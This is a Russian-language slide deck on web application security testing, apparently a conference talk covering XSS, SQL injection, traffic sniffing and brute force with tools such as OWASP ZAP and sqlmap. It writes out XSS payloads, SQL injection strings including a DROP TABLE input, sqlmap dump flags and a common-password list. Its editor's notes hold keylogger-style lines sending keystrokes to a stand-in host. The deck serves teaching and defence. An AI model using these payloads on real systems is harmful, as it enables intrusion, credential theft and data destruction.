Recommended
More Related Content
What's hot
What's hot (20)
Similar to Svyatoslav Login
Similar to Svyatoslav Login (20)
More from Dakiry
More from Dakiry (20)
Svyatoslav Login
- 1. Как провести тестирование на безопасность Web application
- 2. - QA gangsta Lead в - Больше 3 лет тестирую на наличие Web уязвимостей - Больше 6 лет в тестировании - Провожу тренинги по OWASP TOP 10 - Спикер множественных конференций по тестированию: QA Fest, SQA Days, BAQ conference и тд. - Член программного комитета QA Fest - Веду блог по Security testing https://svyat.tech Свят Логин
- 3. В evo.company входят такие проекты:
- 4. Сегодня в программе: - XSS -> OWASP ZAP - Дамп базы данных -> SQLmap - Сниффинг -> Ettercap - Brute force -> Burp Suite
- 6. Классификация XSS - Отраженные (Непостоянные) - Хранимые (Постоянные) - DOM-модели A7:XSS
- 7. Отраженные XSS SEO менеджер Пользователь bank.ua?search=')%3Balert('XSS')%3Bvar b=(' Добрый день! Ваша заработная плата находится по ссылке A7:XSS
- 8. A7:XSS
- 9. Причина возникновения XSS <?php if(!array_key_exists("name",$_GET) | |$_GET['name'] == NULL || $_GET['name']==''){ $isempty=true; } else{ echo '<pre>'; echo 'Hello' . $_GET['name']; echo '</pre>'; } ?> <svg/onload=prompt()> A7:XSS
- 11. Хранимые XSS SEO менеджер Пользователь <img src="http://inexist.ent" onerror="javascript:alert(1)"/> bank.ua A7:XSS
- 12. A7:XSS
- 13. Причина возникновения XSS <?php if(isset($_POST['btnSign'])) { $message = trim($_POST['mtxMessage']); $name = trim($_POST['txtName']); // Sanitize message input $message = stripslashes($message); $message = mysql_real_escape_string($message); // Sanitize name input $name = mysql_real_escape_string($name); $query = "INSERT INTO guestbook (comment,name) VALUES ('$message','$name');"; $result = mysql_query($query) or die('<pre>' . mysql_error() . '</pre>' ); } ?> A7:XSS <svg/onload=prompt()>
- 15. DOM-моделиA7:XSS - Изменить страницу сайта - Выполнить действия от имени какого-то пользователя - Воровство куки - Атака на браузер (сафари и експлорер 7) Аврора ms10_002_aurora - Кейлоггер - Сканирование внутренней сети
- 17. Поиск XSS -> OWASP ZAP OWASP ZAP- это инструмент для тестирования на проникновения и нахождения уязвимостей в веб- приложениях. A7:XSS
- 18. Каковы плюсы OWASP ZAP - Перехват прокси - Автоматизированный сканер - Fuzzing - Поддержка аутентификаций и сессий - Мощный API на основе REST - Поддержка большого количества скриптовых языков - Активно развивается международной командой добровольцев A7:XSS
- 19. A7:XSS
- 20. Как защититьсяA7:XSS ● Использование фреймворков, которые автоматически убирают возможность эксплуатации XSS ● Ознакомиться с Cheat Sheet OSSASP «Профилактика XSS» ● Ознакомиться с OATSP Cheat Sheet «DOM based XSS Prevention» .
- 22. SQL injectionA1:Injection Пример сценариев атакиA1:Injection
- 23. http://web/?id= 6329&print=Y Пример A1:Injection WEB Сервер SQL СУБД SELECT * FROM news WHERE id = 6329 id topic news 6329 News Web A1:Injection
- 24. Пример A1:Injection http://web/?id=6329+UNION+Select +username+password+From+users WEB Сервер SQL СУБД SELECT * FROM users WHERE id = 0 UNION Select username, password From users A1:Injection
- 25. Векторы атаки: SQL, LDAP, XPathA1:Injection Select * From users Where user_name = ‘$username’ AND password = ‘$password’ Authorization User Pass
- 26. Векторы атаки: SQL, LDAP, XPath Authorization User Pass Svyat 1234 A1:Injection Select * From users Where user_name = ‘Svyat’ AND password = ‘1234’ id username password email 1 Svyat 1234 svyat@com.ua
- 27. Векторы атаки: SQL, LDAP, XPath Authorization User Pass admin ‘ OR 1=1 -- A1:Injection Select * From users Where user_name = ‘admin’ AND password = ‘’ OR 1=1 --’
- 28. Векторы атаки: SQL, LDAP, XPath Authorization User Pass admin ‘ OR 1=1 -- A1:Injection Select * From users Where user_name = ‘admin’ AND password = ‘’ OR 1=1 -- id username password email 0 admin ________ admin@com.ua
- 29. A1:Injection Векторы атаки Authorization User Pass admin ‘; DROP TABLE users --
- 30. SQL injectionПоиск SQL injection -> SQLmap SQLmap- это инструмент с открытым исходным кодом для тестирования на проникновение, который автоматизирует процесс выявления и эксплуатирования уязвимостей SQL- инъекций и захват серверов баз данных. A1:Injection
- 31. SQL injectionРабота с SQLmap -u для указания URL --data для передачи локаторов для ввода --cookie для передачи куки для запросов --dbs смотрим какие базы доступны --table смотрим таблицу --columns смотрим колонки --dump скачиваем путь к базе A1:Injection
- 32. SQL injectionДополнительно - level = (1 - 5) - risk = (1 - 3) A1:Injection
- 34. SQL injectionКак защититься 1) Использование безопасного фреймворка для обработки вводимых данных пользователем (Алхимия) 1) Использование «белого списка» и «черного списка» на стороне сервера 1) Для любых динамических запросов избегайте специальных символов либо используйте фильтрацию введенного 1) Использование LIMIT и других элементов управления SQL в запросах A1:Injection
- 35. SQL injectionСниффинг Клиент Сервер Первичное соединение перехват Хацкер A3:SensitiveDataExposure
- 37. A3:SensitiveDataExposure SQL injectioВекторы атаки: Man in the Middle
- 38. A3:SensitiveDataExposure SQL injectioВекторы атаки: Man in the Middle Strict Transport Security Misconfiguration
- 39. Сниффинг -> EttercapA3:SensitiveDataExposure Ettercap — это приложение для анализа сетевого трафика, проходящего через интерфейс компьютера, но с дополнительной функциональностью.
- 41. Как защититься 1. Не позволяйте посторонним лицам иметь доступ в вашу сеть. 2. Когда вы сами пользуетесь публичными точками доступа, то, хотя бы, помните об угрозе перехвата пароля. A3:SensitiveDataExposure
- 43. Векторы атаки: Brute forceA2:BrokenAuthentication email or username Password Authorization User Pass
- 44. Пароль Кол-во 123456 120511 12345 48452 password 39448 DEFAULT 34275 123456789 26620 qwerty 20778 12345678 14172 abc123 10869 pussy 10683 1234567 9468 A2:BrokenAuthentication Топ паролей
- 46. Как защититься ● Многофакторная аутентификация для предотвращения автоматических атак ● Не отправляйте в URL данные для работы с приложением ● Внедрение проверок с плохими паролями https://github.com/danielmiessler/SecLists/tree/master/Passwords ● Используйте пароли с инструкциями NIST 800-63 в разделе 5.1.1 https://pages.nist.gov/800-63-3/sp800-63b.html#memsecret ● Ограничение или увеличение задержки неудачных попыток входа в систему A2:BrokenAuthentication
- 47. Спасибо за внимание! svatogor https://svyat.tech/ Тренинг по OWASP TOP 10 4-5 мая
Editor's Notes
- Следующий пример Хранимой xss, в учасниках у нас все тот же сео менеджер и обычный пользователь. Менеджер нашел уже уязвимость которая не требует отправки особых урлов. А обнаружил что есть уязвимость, которую единожды внедрил на сайт и все пока ее не убирут разрабы, она будет воспроизводиться постоянно. А именно засунул скриптик с картинкой в поле которое не подразумивает работу с картинками, но после отправки картинка отобразиться во всей своей красе и при каждом заходе пользователи будут видить ту самую рекламу в простом месенджере
- t http:get.hack.from.user?key=t f http:get.hack.from.user?key=f n http:get.hack.from.user?key=n
- Это опаснейшая уязвимость, позволяющая злоумышленнику получить доступ к базе данных и возможность читать/изменять/удалять информацию, которая для него не предназначена.
- Такие уязвимости будем искать с помощью приложения sqlmap.
- В случае, если ваш идентификатор украдет злоумышленник, а в системе не были реализованы проверки, скажем IP-адреса сессии, или проверки наличия более одного соединения в одной сессии, злоумышленник сможет получить доступ в систему с правами вашего аккаунта. А если это интернет-банк или кабинет платежной системы, о последствиях такого несанкционированного доступа Вы можете легко догадаться сами. К этой уязвимости можно отнести брут форс, перехват сессии, использование таблица с хешированными данными